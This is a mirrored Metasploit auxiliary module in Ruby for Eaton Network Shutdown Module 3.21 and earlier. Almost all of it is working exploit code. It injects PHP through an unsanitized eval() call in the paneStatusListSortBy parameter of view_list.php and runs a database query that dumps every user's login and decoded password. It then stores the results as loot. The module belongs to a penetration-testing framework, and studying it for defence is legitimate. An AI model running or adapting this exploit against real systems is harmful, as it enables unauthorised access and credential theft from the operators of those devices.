Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

eaton_nsm_creds.rb 3.5KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121
  1. ##
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5. require 'msf/core'
  6. class MetasploitModule < Msf::Auxiliary
  7. include Msf::Auxiliary::Report
  8. include Msf::Exploit::Remote::HttpClient
  9. def initialize(info = {})
  10. super(update_info(info,
  11. 'Name' => 'Network Shutdown Module sort_values Credential Dumper',
  12. 'Description' => %q{
  13. This module will extract user credentials from Network Shutdown Module
  14. versions 3.21 and earlier by exploiting a vulnerability found in
  15. lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
  16. Please note that in order to extract credentials,the vulnerable service
  17. must have at least one USV module (an entry in the "nodes" table in
  18. mgedb.db).
  19. },
  20. 'References' =>
  21. [
  22. ['OSVDB', '83199'],
  23. ['URL', 'http://secunia.com/advisories/49103/']
  24. ],
  25. 'Author' =>
  26. [
  27. 'h0ng10',
  28. 'sinn3r'
  29. ],
  30. 'License' => MSF_LICENSE,
  31. 'DisclosureDate' => "Jun 26 2012"
  32. ))
  33. register_options(
  34. [
  35. Opt::RPORT(4679)
  36. ], self.class)
  37. end
  38. def execute_php_code(code, opts = {})
  39. param_name = Rex::Text.rand_text_alpha(6)
  40. padding = Rex::Text.rand_text_alpha(6)
  41. php_code = Rex::Text.encode_base64(code)
  42. url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
  43. res = send_request_cgi(
  44. {
  45. 'uri' => '/view_list.php',
  46. 'method' => 'POST',
  47. 'vars_get' =>
  48. {
  49. 'paneStatusListSortBy' => url_param,
  50. },
  51. 'vars_post' =>
  52. {
  53. param_name => php_code,
  54. },
  55. 'headers' =>
  56. {
  57. 'Connection' => 'Close'
  58. }
  59. })
  60. res
  61. end
  62. def read_credentials
  63. pattern = Rex::Text.rand_text_numeric(10)
  64. users_var = Rex::Text.rand_text_alpha(10)
  65. user_var = Rex::Text.rand_text_alpha(10)
  66. php = <<-EOT
  67. $#{users_var} = &queryDB("SELECT * FROM configUsers;");
  68. foreach($#{users_var} as $#{user_var}) {
  69. print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}";
  70. } die();
  71. EOT
  72. print_status("Reading user credentials from the database")
  73. response = execute_php_code(php)
  74. if not response or response.code != 200 then
  75. print_error("Failed: Error requesting page")
  76. return
  77. end
  78. credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)
  79. return credentials
  80. end
  81. def run
  82. credentials = read_credentials
  83. if credentials.empty?
  84. print_warning("No credentials collected.")
  85. print_warning("Sometimes this is because the server isn't in the vulnerable state.")
  86. return
  87. end
  88. cred_table = Rex::Text::Table.new(
  89. 'Header' => 'Network Shutdown Module Credentials',
  90. 'Indent' => 1,
  91. 'Columns' => ['Username', 'Password']
  92. )
  93. credentials.each do |record|
  94. cred_table << [record[0], record[1]]
  95. end
  96. print_line
  97. print_line(cred_table.to_s)
  98. loot_name = "eaton.nsm.credentials"
  99. loot_type = "text/csv"
  100. loot_filename = "eaton_nsm_creds.csv"
  101. loot_desc = "Eaton Network Shutdown Module Credentials"
  102. p = store_loot(loot_name, loot_type, datastore['RHOST'], cred_table.to_csv, loot_filename, loot_desc)
  103. print_status("Credentials saved in: #{p.to_s}")
  104. end
  105. end